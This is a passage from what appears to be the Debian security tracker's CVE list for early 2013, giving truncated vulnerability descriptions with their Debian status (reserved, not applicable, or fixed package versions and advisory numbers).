CVE-2013-1462 (Integer signedness error in the ExecuteSoapAction function in the ...)
	- miniupnpd
CVE-2013-1461 (The ExecuteSoapAction function in the SOAPAction handler in the HTTP ...)
	- miniupnpd
CVE-2013-1460 RESERVED
CVE-2013-1459 RESERVED
CVE-2013-1458 RESERVED
CVE-2013-1457 RESERVED
CVE-2013-1456 RESERVED
CVE-2013-1455 (Joomla! 3.0.x through 3.0.2 allows attackers to obtain sensitive ...)
	- joomla (bug #571794)
CVE-2013-1454 (Joomla! 3.0.x through 3.0.2 allows attackers to obtain sensitive ...)
	- joomla (bug #571794)
CVE-2013-1453 (plugins/system/highlight/highlight.php in Joomla! 3.0.x through 3.0.2 ...)
	- joomla (bug #571794)
CVE-2013-1452 RESERVED
CVE-2013-4696 REJECTED
CVE-2013-1451 (Microsoft Internet Explorer 8 and 9, when the Proxy Settings ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1450 (Microsoft Internet Explorer 8 and 9, when the Proxy Settings ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1449 RESERVED
CVE-2013-1448 RESERVED
CVE-2013-1447 RESERVED
CVE-2013-1446 RESERVED
CVE-2013-1445 RESERVED
CVE-2013-1444 RESERVED
CVE-2013-1443 RESERVED
CVE-2013-1442 RESERVED
CVE-2013-1441 RESERVED
CVE-2013-1440 RESERVED
CVE-2013-1439 RESERVED
CVE-2013-1438 RESERVED
CVE-2013-1437 RESERVED
CVE-2013-1436 RESERVED
CVE-2013-1435 RESERVED
CVE-2013-1434 RESERVED
CVE-2013-1433 RESERVED
CVE-2013-1432 RESERVED
CVE-2013-1431 RESERVED
CVE-2013-1430 RESERVED
CVE-2013-1429 [Lintian unsafe symlinks]
	RESERVED
	- lintian 2.5.10.5 (bug #705553; unimportant)
CVE-2013-1428 (Stack-based buffer overflow in the receive_tcppacket function in ...)
	{DSA-2663-1}
	- tinc 1.0.19-3
CVE-2013-1427 (The configuration file for the FastCGI PHP support for lighthttpd ...)
	{DSA-2649-1}
	- lighttpd 1.4.31-4
CVE-2013-1426 RESERVED
CVE-2013-1425 [ldap-git-backup: Incorrect directory permissions expose password hashes]
	RESERVED
	- ldap-git-backup 1.0.4-1 (bug #699227)
CVE-2013-1424 RESERVED
CVE-2013-1423 ((1) contrib/gforge-3.0-cronjobs.patch, (2) cronjobs/homedirs.php, (3) ...)
	{DSA-2633-1}
	- fusionforge 5.2.1+20130227-1
CVE-2013-1422 RESERVED
CVE-2013-1421 RESERVED
CVE-2013-1420 RESERVED
CVE-2013-1419 RESERVED
CVE-2013-1418 RESERVED
CVE-2013-1417 RESERVED
CVE-2013-1416 (The prep_reprocess_req function in do_tgs_req.c in the Key ...)
	- krb5 1.10.1+dfsg-5 (bug #704775)
CVE-2013-1415 (The pkinit_check_kdc_pkid function in ...)
	- krb5 1.10.1+dfsg-4 (low)
	[squeeze] - krb5 (Minor issue)
	NOTE: https://github.com/krb5/krb5/commit/c773d3c775e9b2d88bcdff5f8a8ba88d7ec4e8ed
	NOTE: https://github.com/krb5/krb5/commit/b71f8c4aacea8849ceaf31a2fa95e143f3943097
CVE-2013-1414 RESERVED
CVE-2012-6521 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: Elefant CMS
CVE-2012-6520 (Multiple SQL injection vulnerabilities in the advanced search in ...)
	NOT-FOR-US: Wikidforum
CVE-2012-6519 (SQL injection vulnerability in modules/poll/index.php in DIY-CMS 1.0 ...)
	NOT-FOR-US: DIY-CMS
CVE-2012-6518 (Cross-site request forgery (CSRF) vulnerability in mod.php in DiY-CMS ...)
	NOT-FOR-US: DiY-CMS
CVE-2012-6517 (Multiple cross-site scripting (XSS) vulnerabilities in DiY-CMS 1.0 ...)
	NOT-FOR-US: DiY-CMS
CVE-2012-6516 (SQL injection vulnerability in PHP Ticket System Beta 1 allows remote ...)
	NOT-FOR-US: PHP Ticket System Beta
CVE-2012-6515 (eFront 3.6.10, 3.6.11 build 15059, and earlier allows remote attackers ...)
	NOT-FOR-US: eFront
CVE-2012-6514 (Cross-site scripting (XSS) vulnerability in the nBill (com_netinvoice) ...)
	NOT-FOR-US: nBill for Joomla!
CVE-2012-6513 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: gpEasy CMS
CVE-2012-6512 (The Organizer plugin 1.2.1 for WordPress allows remote attackers to ...)
	NOT-FOR-US: Organizer WordPress plugin not in Debian
CVE-2012-6511 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Organizer WordPress plugin not in Debian
CVE-2012-6510 (Multiple cross-site scripting (XSS) vulnerabilities in NetArt Media ...)
	NOT-FOR-US: NetArt Media Car Portal
CVE-2012-6509 (Unrestricted file upload vulnerability in NetArt Media Car Portal 3.0 ...)
	NOT-FOR-US: NetArt Media Car Portal
CVE-2012-6508 (Multiple cross-site request forgery (CSRF) vulnerabilities in NetArt ...)
	NOT-FOR-US: NetArt Media Car Portal
CVE-2012-6507 (Multiple SQL injection vulnerabilities in admin.php in ChurchCMS 0.0.1 ...)
	NOT-FOR-US: ChurchCMS
CVE-2012-6506 (Multiple cross-site scripting (XSS) vulnerabilities in he Zingiri Web ...)
	NOT-FOR-US: Zingiri Web Shop WordPress plugin not in Debian
CVE-2012-6505 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: PHP Volunteer Management not in Debian
CVE-2012-6504 (SQL injection vulnerability in mods/hours/data/get_hours.php in PHP ...)
	NOT-FOR-US: PHP Volunteer Management not in Debian
CVE-2012-6503 (Unspecified vulnerability in the NinjaXplorer component before 1.0.7 ...)
	NOT-FOR-US: NinjaXplorer for Joomla!
CVE-2012-6502 (Microsoft Internet Explorer before 10 allows remote attackers to ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1413 RESERVED
CVE-2013-1412 RESERVED
CVE-2013-1411 RESERVED
CVE-2013-1410 RESERVED
CVE-2013-1409 RESERVED
CVE-2013-1408 RESERVED
CVE-2013-1407 RESERVED
CVE-2013-1406 (The Virtual Machine Communication Interface (VMCI) implementation in ...)
	NOT-FOR-US: VMware Workstation, Fusion, View, ESXi, ESX
CVE-2013-1405 (VMware vCenter Server 4.0 before Update 4b and 4.1 before Update 3a, ...)
	NOT-FOR-US: VMware
CVE-2013-1404 RESERVED
CVE-2013-1403 RESERVED
CVE-2013-1402 (DigiLIBE 3.4 and possibly other versions sends a redirect but does not ...)
	NOT-FOR-US: DigiLIBE
CVE-2013-1401 RESERVED
CVE-2013-1400 RESERVED
CVE-2009-5134 (Buffer overflow in the "create torrent dialog" functionality in ...)
	NOT-FOR-US: uTorrent
CVE-2013-XXXX [buffer overflow in commandline parsing]
	- swath 0.4.3-3 (low; bug #698189)
	[squeeze] - swath 0.4.0-4+squeeze1
CVE-2013-0243 [Basic constraints vulnerability]
	RESERVED
	- haskell-tls-extra 0.4.6.1-1 (bug #698545)
CVE-2013-1399 RESERVED
CVE-2013-1398 RESERVED
CVE-2013-1397 RESERVED
CVE-2013-1396 RESERVED
CVE-2013-1395 RESERVED
CVE-2013-1394 RESERVED
CVE-2013-1393 RESERVED
CVE-2013-1392 RESERVED
CVE-2013-1391 RESERVED
CVE-2013-1390 RESERVED
CVE-2013-1389 (Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 11, ...)
	NOT-FOR-US: Adobe ColdFusion 9.0
CVE-2013-1388 (Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-1387 (Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, ...)
	NOT-FOR-US: Adobe ColdFusion
CVE-2013-1386 (Adobe Shockwave Player before 12.0.2.122 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-1385 (Adobe Shockwave Player before 12.0.2.122 does not prevent access to ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-1384 (Adobe Shockwave Player before 12.0.2.122 allows attackers to execute ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-1383 (Buffer overflow in Adobe Shockwave Player before 12.0.2.122 allows ...)
	NOT-FOR-US: Adobe Shockwave Player
CVE-2013-1382 RESERVED
CVE-2013-1381 RESERVED
CVE-2013-1380 (Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1379 (Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1378 (Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1377 RESERVED
CVE-2013-1376 RESERVED
	NOT-FOR-US: Adobe Reader
CVE-2013-1375 (Heap-based buffer overflow in Adobe Flash Player before 10.3.183.68 ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1374 (Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1373 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1372 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1371 (Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1370 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1369 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1368 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1367 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1366 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-1365 (Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2012-6110 [bcron file descriptors not closed]
	RESERVED
	- bcron 0.09-13 (low; bug #686650)
	[squeeze] - bcron 0.09-11+squeeze1
CVE-2013-1364 [possible to override LDAP configuration parameters via the API]
	RESERVED
	- zabbix 1:2.0.4+dfsg-2 (bug #698541)
	NOTE: patches in https://support.zabbix.com/browse/ZBX-6097
CVE-2013-1363 RESERVED
CVE-2013-1362 [Allows passing of $() as command arguments and executing shell commands]
	RESERVED
	- nagios-nrpe 2.13-3 (low; bug #701227)
	[squeeze] - nagios-nrpe (Minor issue)
CVE-2013-1361 RESERVED
CVE-2013-1360 RESERVED
CVE-2013-1359 RESERVED
CVE-2013-1358 RESERVED
CVE-2013-1357 RESERVED
CVE-2013-1356 RESERVED
CVE-2013-1355 RESERVED
CVE-2013-1354 RESERVED
CVE-2013-1353 RESERVED
CVE-2013-1352 RESERVED
CVE-2013-1351 RESERVED
CVE-2013-1350 RESERVED
CVE-2013-1349 RESERVED
CVE-2013-1348 RESERVED
CVE-2013-1347 (Microsoft Internet Explorer 8 does not properly handle objects in ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1346 (mpengine.dll in Microsoft Malware Protection Engine before 1.1.9506.0 ...)
	NOT-FOR-US: Microsoft Malware Protection Engine
CVE-2013-1345 RESERVED
CVE-2013-1344 RESERVED
CVE-2013-1343 RESERVED
CVE-2013-1342 RESERVED
CVE-2013-1341 RESERVED
CVE-2013-1340 RESERVED
CVE-2013-1339 RESERVED
CVE-2013-1338 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1337 (Microsoft .NET Framework 4.5 does not properly create policy ...)
	NOT-FOR-US: Microsoft .NET Framework 4.5
CVE-2013-1336 (The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, ...)
	NOT-FOR-US: Microsoft .NET Framework
CVE-2013-1335 (Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to ...)
	NOT-FOR-US: Microsoft Word
CVE-2013-1334 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1333 (Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1332 (dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1331 RESERVED
CVE-2013-1330 RESERVED
CVE-2013-1329 (Integer signedness error in Microsoft Publisher 2003 SP3 allows remote ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1328 (Microsoft Publisher 2003 SP3, 2007 SP3, and 2010 SP1 allows remote ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1327 (Integer signedness error in Microsoft Publisher 2003 SP3 allows remote ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1326 RESERVED
CVE-2013-1325 RESERVED
CVE-2013-1324 RESERVED
CVE-2013-1323 (Microsoft Publisher 2003 SP3 does not properly handle NULL values for ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1322 (Microsoft Publisher 2003 SP3 does not properly check table range data, ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1321 (Microsoft Publisher 2003 SP3 does not properly check the data type of ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1320 (Buffer overflow in Microsoft Publisher 2003 SP3 allows remote ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1319 (Microsoft Publisher 2003 SP3 does not properly check the return value ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1318 (Microsoft Publisher 2003 SP3 allows remote attackers to execute ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1317 (Integer overflow in Microsoft Publisher 2003 SP3 allows remote ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1316 (Microsoft Publisher 2003 SP3 does not properly validate the size of an ...)
	NOT-FOR-US: Microsoft Publisher
CVE-2013-1315 RESERVED
CVE-2013-1314 RESERVED
CVE-2013-1313 (Object Linking and Embedding (OLE) Automation in Microsoft Windows XP ...)
	NOT-FOR-US: Microsoft Windows XP
CVE-2013-1312 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1311 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1310 (Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1309 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1308 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1307 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1306 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1305 (HTTP.sys in Microsoft Windows 8, Windows Server 2012, and Windows RT ...)
	NOT-FOR-US: Microsoft
CVE-2013-1304 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1303 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1302 (Microsoft Communicator 2007 R2, Lync 2010, Lync 2010 Attendee, and ...)
	NOT-FOR-US: Microsoft
CVE-2013-1301 (Microsoft Visio 2003 SP3 2007 SP3, and 2010 SP1 allows remote ...)
	NOT-FOR-US: Microsoft Visio
CVE-2013-1300 RESERVED
CVE-2013-1299 (Microsoft Windows Modern Mail allows remote attackers to spoof link ...)
	NOT-FOR-US: Microsoft Windows Modern Mail
CVE-2013-1298 RESERVED
CVE-2013-1297 (Microsoft Internet Explorer 6 through 8 does not properly restrict ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1296 (The Remote Desktop ActiveX control in mstscax.dll in Microsoft Remote ...)
	NOT-FOR-US: Microsoft Remote Desktop Connection Client
CVE-2013-1295 (The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1294 (Race condition in the kernel in Microsoft Windows XP SP2 and SP3, ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1293 (The NTFS kernel-mode driver in Microsoft Windows Vista SP2, Windows ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1292 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1291 (win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1290 (Microsoft SharePoint Server 2013, in certain configurations involving ...)
	NOT-FOR-US: Microsoft SharePoint Server
CVE-2013-1289 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint ...)
	NOT-FOR-US: Microsoft SharePoint Server
CVE-2013-1288 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-1287 (The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1286 (The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1285 (The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1284 (Race condition in the kernel in Microsoft Windows 8, Windows Server ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1283 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1282 (The LDAP service in Microsoft Active Directory, Active Directory ...)
	NOT-FOR-US: Microsoft
CVE-2013-1281 (The NFS server in Microsoft Windows Server 2008 R2 and R2 SP1 and ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1280 (The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1279 (Race condition in the kernel in Microsoft Windows XP SP2 and SP3, ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1278 (Race condition in the kernel in Microsoft Windows XP SP2 and SP3, ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1277 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1276 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1275 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1274 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1273 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1272 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1271 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1270 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1269 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1268 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1267 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1266 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1265 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1264 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1263 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1262 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1261 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1260 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1259 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1258 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1257 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1256 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1255 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1254 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1253 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1252 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1251 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1250 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1249 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-1248 (Race condition in win32k.sys in the kernel-mode drivers in Microsoft ...)
	NOT-FOR-US: Microsoft Windows
CVE-2012-6501 (The KillProcess method in the HP PKI ActiveX control (HPPKI.ocx) ...)
	NOT-FOR-US: HP PKI ActiveX
CVE-2012-6500 (Directory traversal vulnerability in download.lib.php in Pragyan CMS ...)
	NOT-FOR-US: Pragyan CMS
CVE-2012-6499 (Open redirect vulnerability in age-verification.php in the Age ...)
	NOT-FOR-US: Age Verification plugin for WordPress
CVE-2011-5254 (Unspecified vulnerability in the Connections plugin before 0.7.1.6 for ...)
	NOT-FOR-US: Connections plugin for WordPress
CVE-2011-5253 (Dl Download Ticket Service 0.3 through 0.9 allows remote attackers to ...)
	NOT-FOR-US: Dl Download Ticket Service
CVE-2011-5252 (Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x ...)
	NOT-FOR-US: Orchard
CVE-2012-0722 REJECTED
CVE-2013-1247 RESERVED
CVE-2013-1246 RESERVED
CVE-2013-1245 (The user-management page in Cisco WebEx Social relies on client-side ...)
	NOT-FOR-US: Cisco WebEx Social
CVE-2013-1244 (Cross-site scripting (XSS) vulnerability in the portal module in Cisco ...)
	NOT-FOR-US: Cisco WebEx Social
CVE-2013-1243 RESERVED
CVE-2013-1242 (Memory leak in the web framework in the server in Cisco Unified ...)
	NOT-FOR-US: Cisco
CVE-2013-1241 (The ISM module in Cisco IOS on ISR G2 routers does not properly handle ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1240 (The command-line interface in Cisco Unified Communications Manager ...)
	NOT-FOR-US: Cisco Unified Communications Manager
CVE-2013-1239 RESERVED
CVE-2013-1238 RESERVED
CVE-2013-1237 RESERVED
CVE-2013-1236 (Cisco TelePresence Supervisor MSE 8050 before 2.3(1.31) allows remote ...)
	NOT-FOR-US: Cisco TelePresence Supervisor
CVE-2013-1235 (Cisco Wireless LAN Controller (WLC) devices do not properly address ...)
	NOT-FOR-US: Cisco Wireless LAN Controller
CVE-2013-1234 (The SNMP module in Cisco IOS XR allows remote authenticated users to ...)
	NOT-FOR-US: Cisco IOS XR
CVE-2013-1233 RESERVED
CVE-2013-1232 (The HTTP implementation in Cisco WebEx Node for MCS, WebEx Meetings ...)
	NOT-FOR-US: Cisco WebEx
CVE-2013-1231 (The HTTP implementation in Cisco WebEx Node for MCS and WebEx Meetings ...)
	NOT-FOR-US: Cisco WebEx
CVE-2013-1230 (Cisco Unified Communications Domain Manager allows remote attackers to ...)
	NOT-FOR-US: Cisco
CVE-2013-1229 (TMSSNMPService.exe in TelePresence Manager in Cisco TelePresence ...)
	NOT-FOR-US: Cisco
CVE-2013-1228 RESERVED
CVE-2013-1227 (Cross-site scripting (XSS) vulnerability in the web framework in Cisco ...)
	NOT-FOR-US: Cisco Unified Communications Domain Manager
CVE-2013-1226 (The Ethernet frame-forwarding implementation in Cisco NX-OS on Nexus ...)
	NOT-FOR-US: Cisco NX-OS
CVE-2013-1225 (Cisco Unified Customer Voice Portal (CVP) Software before 9.0.1 ES 11 ...)
	NOT-FOR-US: Cisco Unified Customer Voice Portal
CVE-2013-1224 (Directory traversal vulnerability in the Resource Manager in Cisco ...)
	NOT-FOR-US: Cisco Unified Customer Voice Portal
CVE-2013-1223 (The log viewer in Cisco Unified Customer Voice Portal (CVP) Software ...)
	NOT-FOR-US: Cisco Unified Customer Voice Portal
CVE-2013-1222 (The Tomcat Web Management feature in Cisco Unified Customer Voice ...)
	NOT-FOR-US: Cisco Unified Customer Voice Portal
CVE-2013-1221 (The Tomcat Web Management feature in Cisco Unified Customer Voice ...)
	NOT-FOR-US: Cisco Unified Customer Voice Portal
CVE-2013-1220 (The CallServer component in Cisco Unified Customer Voice Portal (CVP) ...)
	NOT-FOR-US: Cisco Unified Customer Voice Portal
CVE-2013-1219 (SensorApp in Cisco Intrusion Prevention System (IPS) allows local ...)
	NOT-FOR-US: Cisco Intrusion Prevention System
CVE-2013-1218 RESERVED
CVE-2013-1217 (The generic input/output control implementation in Cisco IOS does not ...)
	NOT-FOR-US: Cisco IOS
CVE-2013-1216 (Memory leak in the SNMP module in Cisco IOS XR allows remote ...)
	NOT-FOR-US: Cisco IOS XR
CVE-2013-1215 (The vpnclient program in the Easy VPN component on Cisco Adaptive ...)
	NOT-FOR-US: Cisco
CVE-2013-1214 (The scripts editor in Cisco Unified Contact Center Express (aka ...)
	NOT-FOR-US: Cisco Unified Contact Center Express
CVE-2013-1213 RESERVED
CVE-2013-1212 RESERVED
CVE-2013-1211 RESERVED
CVE-2013-1210 RESERVED
CVE-2013-1209 RESERVED
CVE-2013-1208 RESERVED
CVE-2013-1207 RESERVED
CVE-2013-1206 RESERVED
CVE-2013-1205 RESERVED
CVE-2013-1204 RESERVED
CVE-2013-1203 RESERVED
CVE-2013-1202 RESERVED
CVE-2013-1201 RESERVED
CVE-2013-1200 (Session fixation vulnerability in Cisco Secure Access Control System ...)
	NOT-FOR-US: Cisco Secure Access Control System
CVE-2013-1199 (Race condition in the CIFS implementation in the rewriter module in ...)
	NOT-FOR-US: Cisco
CVE-2013-1198 (Cross-site scripting (XSS) vulnerability in a Flash component in Cisco ...)
	NOT-FOR-US: Cisco Unified Computing System
CVE-2013-1197 (The XML parser in the server in Cisco Unified Presence (CUP) allows ...)
	NOT-FOR-US: Cisco Unified Presence
CVE-2013-1196 (The command-line interface in Cisco Secure Access Control System ...)
	NOT-FOR-US: Cisco
CVE-2013-1195 (The time-based ACL implementation on Cisco Adaptive Security ...)
	NOT-FOR-US: Cisco Adaptive Security Appliances
CVE-2013-1194 (The ISAKMP implementation on Cisco Adaptive Security Appliances (ASA) ...)
	NOT-FOR-US: Cisco
CVE-2013-1193 (The Secure Shell (SSH) implementation on Cisco Adaptive Security ...)
	NOT-FOR-US: Cisco
CVE-2013-1192 (The JAR files on Cisco Device Manager for Cisco MDS 9000 devices ...)
	NOT-FOR-US: Cisco Device Manager
CVE-2013-1191 RESERVED
CVE-2013-1190 RESERVED
CVE-2013-1189 (Cisco Universal Broadband (aka uBR) 10000 series routers, when an ...)
	NOT-FOR-US: Cisco Universal Broadband 10000 series routers
CVE-2013-1188 (Cisco Unified Communications Manager (CUCM) does not properly limit ...)
	NOT-FOR-US: Cisco Unified Communications Manager
CVE-2013-1187 (The Connection Manager in Cisco Jabber Extensible Communications ...)
	NOT-FOR-US: Cisco
CVE-2013-1186 (Cisco Unified Computing System (UCS) 1.x before 1.4(4) and 2.x before ...)
	NOT-FOR-US: Cisco Unified Computing System
CVE-2013-1185 (The web interface in the Manager component in Cisco Unified Computing ...)
	NOT-FOR-US: Cisco Unified Computing System
CVE-2013-1184 (The management API in the XML API management service in the Manager ...)
	NOT-FOR-US: Cisco Unified Computing System
CVE-2013-1183 (Buffer overflow in the Intelligent Platform Management Interface ...)
	NOT-FOR-US: Cisco Unified Computing System
CVE-2013-1182 (The login page in the Web Console in the Manager component in Cisco ...)
	NOT-FOR-US: Cisco Unified Computing System
CVE-2013-1181 (Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), ...)
	NOT-FOR-US: Cisco
CVE-2013-1180 (Buffer overflow in the SNMP implementation in Cisco NX-OS on Nexus ...)
